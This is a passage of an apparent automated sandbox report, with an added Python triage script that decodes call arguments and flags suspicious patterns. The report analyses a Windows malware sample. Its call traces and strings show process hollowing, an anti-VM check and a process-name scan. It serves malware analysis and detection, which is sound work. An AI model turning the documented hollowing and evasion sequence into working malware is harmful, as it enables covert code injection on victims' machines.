3 API calls 2913->2914 2915 4023b1 CopyRect 2914->2915 2916 4039c0 3 API calls 2915->2916 2917 4023d1 CopyRect 2916->2917 2918 4040f0 3 API calls 2917->2918 2919 4023f1 CopyRect 2918->2919 2920 4039c0 3 API calls 2919->2920 2921 402411 CopyRect 2920->2921 2922 4039c0 3 API calls 2921->2922 2923 402431 CopyRect 2922->2923 2924 4040f0 3 API calls 2923->2924 2925 402451 CopyRect 2924->2925 2926 4040f0 3 API calls 2925->2926 2927 402471 CopyRect 2926->2927 2928 4039c0 3 API calls 2927->2928 2929 402491 CopyRect 2928->2929 2930 4040f0 3 API calls 2929->2930 2931 4024b1 CopyRect 2930->2931 2932 4040f0 3 API calls 2931->2932 2933 4024d1 CopyRect 2932->2933 2934 4040f0 3 API calls 2933->2934 2935 4024f1 2934->2935 2935->2604 2937 4039f4 2936->2937 2938 403b03 _ftol _ftol 2937->2938 2939 403b5e 2937->2939 2941 403bac 2937->2941 2938->2938 2938->2939 2940 403b90 Polygon 2939->2940 2940->2941 2941->2607 2943 4046a5 2942->2943 2944 404776 _ftol _ftol 2943->2944 2945 4047d8 2943->2945 2947 404805 2943->2947 2944->2944 2944->2945 2946 4047eb Polyline 2945->2946 2946->2947 2947->2609 2949 40412b 2948->2949 2950 40423e _ftol _ftol 2949->2950 2951 404299 2949->2951 2953 4042ed 2949->2953 2950->2950 2950->2951 2952 4042c9 PolyPolygon 2951->2952 2952->2953 2953->2887 3592 40ada0 EnableWindow 3593 40a7a0 GetWindowRect 3594 40a7c1 3593->3594 3595 404ec0 24 API calls 3594->3595 3596 40a7e1 SetCapture 3595->3596 3597 40a7f4 3596->3597 2585 40b261 _exit 3046 40b2e3 3047 40b2e8 3046->3047 3050 40b2ba 3047->3050 3051 40b2bf 3050->3051 3052 40b2d4 _setmbcp 3051->3052 3053 40b2dd 3051->3053 3052->3053 2337 405830 2340 40a1b0 2337->2340 2339 405856 2341 40a1d9 2340->2341 2342 40a1fd LoadIconA 2341->2342 2342->2339 2954 40ac30 RectVisible 3476 40acb0 TabbedTextOutA 3575 40ad70 Escape 3577 40ad30 3578 40ad38 3577->3578 3579 40ad3b GrayStringA 3577->3579 3578->3579 3580 4057f0 3581 4057f5 3580->3581 3584 40b0c8 3581->3584 3587 40b09c 3584->3587 3586 40581a 3588 40b0b1 __dllonexit 3587->3588 3589 
40b0a5 _onexit 3587->3589 3588->3586 3589->3586
APIs
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
• GetProcAddress.KERNEL32(00000000), ref: 004074EA
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
• GetProcAddress.KERNEL32(00000000), ref: 00407500
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
• LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
• LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
• LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
• LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
• LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
• LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
• LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
• LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
• LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
• LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
• LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
• LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
• LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
• LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
• LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
• wcscpy.MSVCRT ref: 00407B17
• wcscpy.MSVCRT ref: 00407F50
• wcscat.MSVCRT ref: 00407F7A
• wcscpy.MSVCRT ref: 00407F8A
• wcscat.MSVCRT ref: 00407F9E
• wcscat.MSVCRT ref: 00408144
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
• Wow64GetThreadContext.KERNEL32 ref: 004081A2
• NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
• VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
• VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
• WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
• WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
• WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
• WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
• WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
• Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
• Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
• wcscpy.MSVCRT ref: 00408760
• wcscat.MSVCRT ref: 00408774
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
• CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
• ResumeThread.KERNELBASE(?), ref: 004087FC
• Sleep.KERNELBASE(00000002), ref: 00408815
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
• Module32First.KERNEL32(00000000,00000000), ref: 004088AC
• strstr.MSVCRT ref: 004088D6
• Wow64SuspendThread.KERNEL32(?), ref: 00408904
• Wow64SuspendThread.KERNEL32(?), ref: 0040891F
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
• DeleteFileW.KERNELBASE(?), ref: 00408930
• ResumeThread.KERNELBASE(?), ref: 00408949
• Sleep.KERNELBASE(00000002), ref: 0040894D
• DeleteFileW.KERNELBASE(?), ref: 00408956
• Wow64SuspendThread.KERNEL32(?), ref: 0040897B
• Sleep.KERNELBASE(00000005), ref: 0040898A
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
• ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
• wcscat.MSVCRT ref: 00408A5B
• wcsstr.MSVCRT ref: 00408A82
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
• TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
• CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
• Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
• Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
• strstr.MSVCRT ref: 00408E02
• strstr.MSVCRT ref: 00408E16
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
• CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
• CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
• CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
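The function record above is the one worth a reverser's time: the sandbox only prints raw hex arguments, so the allocation type, page protection, file dispositions and MoveFileEx flags have to be decoded by hand, and the interesting part is the order of calls (Toolhelp32 walk plus strstr, RWX VirtualAlloc, CreateProcessA followed within two calls by TerminateProcess, DeleteFile/MoveFileEx around a suspended thread) rather than any single API. The script below is an added example, not Joe Sandbox's code and not code from the sample: it parses API lines in the report's own format, decodes the documented Win32 constants, and flags those call patterns. The sample trace is copied from the record above, the String ID excerpt is an abbreviated copy of the same record's field, and the pattern names and string watchlist are this example's own heuristics (assumptions), not Joe Sandbox signature names.

```python
"""Triage helper for Joe Sandbox-style function records (added example, not Joe Sandbox code).

Decodes raw Win32 argument values in the report's API lines and flags the call
patterns a reverser looks at first. Pattern names are this script's own heuristics.
"""
import re

# Constructed sample: API lines copied from the function record above.
SAMPLE_TRACE = """\
• Module32First.KERNEL32(00000000,00000000), ref: 004088AC
• strstr.MSVCRT ref: 004088D6
• Wow64SuspendThread.KERNEL32(?), ref: 00408904
• DeleteFileW.KERNELBASE(?), ref: 00408930
• ResumeThread.KERNELBASE(?), ref: 00408949
• MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
• TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
• CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
• CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
• Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
• Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
• strstr.MSVCRT ref: 00408E02
• VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
• ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
• Sleep.KERNELBASE(00000320), ref: 004099F6
• TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
"""

# Constructed sample: abbreviated excerpt of the same record's "String ID" field.
SAMPLE_STRING_ID = ("$ /c $.dll$Allocat$CopyFil$EqualSid$ExitProc$IsWow64Proc$LookupAccountSidA"
                    "$NtUnmapVi$Program Fil$VBoxS$VirtualAlloc$VirtualAllocEx$\\cmd.$ntdll.dll$psapi.dll$a$b$c")

LINE_RE = re.compile(
    r"\u2022?\s*(?P<api>\w+)\.(?P<mod>\w+)"        # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                    # optional (arg,arg,...)
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"      # call-site address
)

# Documented Win32 constants used by the decoders.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_FLAGS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVEFILE_FLAGS = {0x1: "MOVEFILE_REPLACE_EXISTING", 0x2: "MOVEFILE_COPY_ALLOWED",
                  0x4: "MOVEFILE_DELAY_UNTIL_REBOOT", 0x8: "MOVEFILE_WRITE_THROUGH"}

# Watchlist of truncated strings (this example's own; the record's API ID line
# independently confirms UnmapViewSection and VirtualAllocEx usage).
STRING_WATCHLIST = {
    "NtUnmapVi": "NtUnmapViewOfSection, unmap target image (hollowing primitive)",
    "VirtualAllocEx": "allocation inside another process",
    "VBoxS": "VBoxService / VirtualBox guest check",
    "IsWow64Proc": "IsWow64Process, 32/64-bit environment check",
    "\\cmd.": "cmd.exe launch",
    "/c": "cmd.exe /c argument",
}


def _arg(token):
    token = token.strip()
    if token in ("", "?"):
        return None                  # sandbox could not recover the value
    try:
        return int(token, 16)        # also accepts the report's "-00000400"
    except ValueError:
        return token                 # e.g. the ".dll" literal recovered for ReadFile


def parse_trace(text):
    """Turn report API lines into dicts: api, module, decoded args, call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m["args"]
        args = [_arg(t) for t in raw.split(",")] if raw is not None else []
        calls.append({"api": m["api"], "mod": m["mod"], "args": args, "ref": int(m["ref"], 16)})
    return calls


def _flags(value, table):
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def decode_call(call):
    """Render the calls whose numeric arguments carry meaning; others just by name."""
    api, a = call["api"], call["args"]
    if api == "VirtualAlloc" and len(a) >= 4:
        return f"VirtualAlloc size={a[1]} type={_flags(a[2], MEM_FLAGS)} protect={_flags(a[3], PAGE_PROTECT)}"
    if api in ("CreateFileW", "CreateFileA") and len(a) >= 5:
        return (f"{api} access={_flags(a[1], ACCESS_FLAGS)} share={_flags(a[2], SHARE_FLAGS)} "
                f"disposition={DISPOSITION.get(a[4], a[4])}")
    if api == "MoveFileExW" and len(a) >= 3:
        return f"MoveFileExW flags={_flags(a[2], MOVEFILE_FLAGS)}"
    if api == "Sleep" and a and a[0] is not None:
        return f"Sleep {a[0]} ms"
    return api


def triage(calls):
    """Heuristic call-sequence patterns (names are this example's own)."""
    apis = [c["api"] for c in calls]
    findings = set()
    if "CreateToolhelp32Snapshot" in apis and "Process32Next" in apis and "strstr" in apis:
        findings.add("process-name scan (Toolhelp32 walk + strstr)")
    if any(c["api"] == "VirtualAlloc" and len(c["args"]) >= 4 and c["args"][3] == 0x40 for c in calls):
        findings.add("RWX allocation (PAGE_EXECUTE_READWRITE)")
    for i, api in enumerate(apis):
        if api.startswith("CreateProcess") and "TerminateProcess" in apis[i + 1:i + 4]:
            findings.add("spawn-then-terminate (CreateProcess followed by TerminateProcess)")
    if {"Wow64SuspendThread", "DeleteFileW", "MoveFileExW", "ResumeThread"} <= set(apis):
        findings.add("suspend/delete/move/resume file-replacement sequence")
    return sorted(findings)


def string_indicators(string_id_field):
    """Map watchlisted tokens of a '$'-separated String ID field to a short note."""
    hits = {}
    for token in (t.strip() for t in string_id_field.split("$")):
        for prefix, note in STRING_WATCHLIST.items():
            if token and token.startswith(prefix):
                hits[token] = note
    return hits


if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    for call in trace:
        print(f"{call['ref']:08X}  {decode_call(call)}")
    for finding in triage(trace):
        print("finding:", finding)
    for tok, note in string_indicators(SAMPLE_STRING_ID).items():
        print(f"string {tok!r}: {note}")
```

Two caveats when reading the decoded output. The `-00000400` size on the VirtualAlloc line is whatever the sandbox's argument recovery produced, so the script passes it through rather than treating it as a real allocation size; and `FindCloseChangeNotification.KERNELBASE(...)` lines in these records are, in many Windows builds, CloseHandle calls that resolved to the other export sharing the same address, so they are not evidence of directory-change monitoring.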

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Graph node 409: 40b2a2-40b2b7, calls 6CDC4ED0
                                                                        APIs
                                                                        • 6CDC4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystem$ClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1397294514-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmp
